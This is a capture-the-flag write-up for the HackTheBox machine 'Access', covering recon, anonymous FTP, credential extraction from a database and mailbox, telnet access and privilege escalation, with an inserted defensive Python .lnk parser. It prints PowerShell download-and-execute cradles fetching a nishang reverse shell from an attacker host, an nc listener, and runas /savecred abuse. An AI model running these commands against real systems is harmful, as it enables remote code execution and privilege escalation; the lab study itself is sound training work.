Hackthebox - Access

Machine information

Machine type

Information gathering

Nmap

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.98 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-24 22:29 EDT
Nmap scan report for 10.10.10.98
Host is up (0.34s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 23/tcp)
HOP RTT       ADDRESS
1   338.15 ms 10.10.14.1
2   338.30 ms 10.10.10.98

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.52 seconds

There is an FTP service here; check it with the anonymous user.

FTP

┌──(root💀kali)-[~/Desktop]
└─# ftp 10.10.10.98
Connected to 10.10.10.98.
220 Microsoft FTP Service
Name (10.10.10.98:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

After logging in there are two directories.

ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer
226 Transfer complete.

Backups and Engineer each contain one file.

ftp> ls backups
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> ls engineer
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  01:16AM                10870 Access Control.zip
226 Transfer complete.

Download both with get; backup.mdb is fairly large, so it takes a while.

Now take a look at the backup.mdb file.

Exploitation

Zip

┌──(root💀kali)-[~/Desktop]
└─# strings backup.mdb|grep access
access4u@security

We found a password; it is probably the archive password, so try extracting with it.

┌──(root💀kali)-[~/Desktop]
└─# ls Access\ Control.pst
'Access Control.pst'

Extraction succeeded.

PST

Use readpst to extract the mailbox from the PST file.

┌──(root💀kali)-[~/Desktop]
└─# readpst Access\ Control.pst 
Opening PST file and indexes...
Processing Folder "Deleted Items"
        "Access Control" - 2 items done, 0 items skipped.

Then view the extracted mailbox.

┌──(root💀kali)-[~/Desktop]
└─# cat Access\ Control.mbox

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Inside it we find a password.

username = security
password = 4Cc3ssC0ntr0ller

Try logging in with it on port 23.

┌──(root💀kali)-[~/Desktop]
└─# telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

We successfully get a shell with user privileges.

C:\Users\security\Desktop>type user.txt
ff1f3b48913b213a31ff6756d2553d38

Successfully got the user flag.

Privilege escalation

C:\Users\security>powershell whoami
access\security

This confirms PowerShell exists and can run commands.

┌──(root💀kali)-[~/Desktop]
└─# cp /opt/shells/Invoke-PowerShellTcp.ps1 nishang.ps1

We use nishang for the privilege escalation stage.

Start an HTTP server with python3:

python3 -m http.server 80

Append the following line to the end of nishang.ps1:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444

Then listen on a port with nc:

nc -nvlp 4444

And run the download cradle in the telnet session:

powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/nishang.ps1')"

PS C:\Users\security>whoami
access\security

Now we have an interactive shell. This step is actually optional, but I like typing commands inside a shell, and not being able to use the backspace key is painful.

https://github.com/411Hall/JAWS

Next we use JAWS for enumeration.

powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/jaws-enum.ps1')"
cmd.exe                   764 security /q /k C:\Windows\system32\login.cmd

Here we see something interesting; let's check what it is.

C:\Users\security>type C:\Windows\system32\login.cmd
@echo off
rem
rem  Default global login script for the Telnet Server
rem
rem  In the default setup, this command script is executed when the
rem  initial command shell is invoked.  It, in turn, will try to invoke
rem  the individual user's login script.
rem

echo *===============================================================
echo Microsoft Telnet Server.
echo *===============================================================

cd /d %HOMEDRIVE%\%HOMEPATH%

That is the content of the script.

C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator

cmdkey /list reveals a stored credential for ACCESS\Administrator, which means runas /savecred can use it without prompting for the password.

PS C:\Users\Public\Desktop>dir

    Directory: C:\Users\Public\Desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         8/22/2018  10:18 PM       1870 ZKAccess3.5 Security System.lnk

On the Public user's desktop there is a shortcut file; let's look at it.

PS C:\Users\Public\Desktop> type "ZKAccess3.5 Security System.lnk"
L?F?@ ??7???7???#?P/P?O? ?:i?+00?/C:\R1M?:Windows???:?▒M?:*wWindowsV1MV?System32???:?▒MV?*?System32▒X2P?:?
                                                                                                           runas.exe???:1??:1?*Yrunas.exe▒L-K??E?C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico?%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico?%?
                       ?wN?▒?]N?D.??Q???`?Xaccess?_???8{E?3
                                                           O?j)?H???
                                                                    )??[?_???8{E?3
                                                                                  O?j)?H???
                                                                                           )??[?        ??1SPS??XF?L8C???&?m?e*S-1-5-21-953262931-566350628-63446256-500

We can see this line:

\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"

This means Access.exe is run with Administrator privileges using the saved credential. If we replace the Access.exe at the end with our own command, wouldn't that give us elevated privileges?

We replace Access.exe here with our nishang payload.
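Rather than reading the raw `type` output, a defender auditing shortcuts for saved-credential runas launches can parse the .lnk StringData fields directly. The following is an added example (not from the original writeup) that builds a minimal MS-SHLLINK file with the same relative path, working directory and arguments as the shortcut above, parses it back, and flags the /savecred pattern; the builder and the constructed sample are mine, and real shortcuts additionally carry IDList and LinkInfo sections, which the parser skips by size.

```python
import struct

# MS-SHLLINK header: size 0x4C, CLSID {00021401-0000-0000-C000-000000000046}, then LinkFlags at offset 20
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = (1 << i for i in range(8))
# StringData fields appear in this fixed order, each as CountCharacters (uint16) followed by the text
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELPATH), ("working_dir", HAS_WORKDIR),
                 ("arguments", HAS_ARGS), ("icon_location", HAS_ICON))

def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Constructed minimal shell link: header plus UTF-16 StringData, no IDList or LinkInfo."""
    flags = HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", HEADER_SIZE, LINK_CLSID, flags).ljust(HEADER_SIZE, b"\0")
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body

def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a shell link, skipping IDList and LinkInfo by their sizes."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data)[0] != HEADER_SIZE or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = HEADER_SIZE
    if flags & HAS_IDLIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]  # IDListSize excludes the size field itself
    if flags & HAS_LINKINFO:
        off += struct.unpack_from("<I", data, off)[0]      # LinkInfoSize includes the size field
    width, enc = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    fields = {}
    for name, bit in STRING_FIELDS:
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]
            fields[name] = data[off + 2:off + 2 + count * width].decode(enc)
            off += 2 + count * width
    return fields

def uses_saved_credential(fields: dict) -> bool:
    """Flag shortcuts that launch runas.exe with /savecred: any local user can reuse that stored credential."""
    args = fields.get("arguments", "").lower()
    return "runas.exe" in fields.get("relative_path", "").lower() and "/savecred" in args and "/user:" in args

# Sample constructed from the fields visible in the shortcut dump above (not the real file)
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\runas.exe", r"C:\ZKTeco\ZKAccess3.5",
                       r'/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"')

if __name__ == "__main__":
    parsed = parse_lnk(SAMPLE_LNK)
    print(parsed["arguments"], "->", "saved-credential runas" if uses_saved_credential(parsed) else "ok")
```

On a real host the same check can be run over every .lnk under the Public and per-user Desktop and Start Menu folders, and any hit should be paired with a review of what `cmdkey /list` stores for that account.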

runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.9/nishang.ps1')"

┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.98] 49166
Windows PowerShell running as user Administrator on ACCESS
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
access\administrator

We successfully get a shell with Administrator privileges.

PS C:\users\administrator\desktop> type root.txt
6e1586cc7ab230a8d297e8f933d904cf

Successfully got the root flag.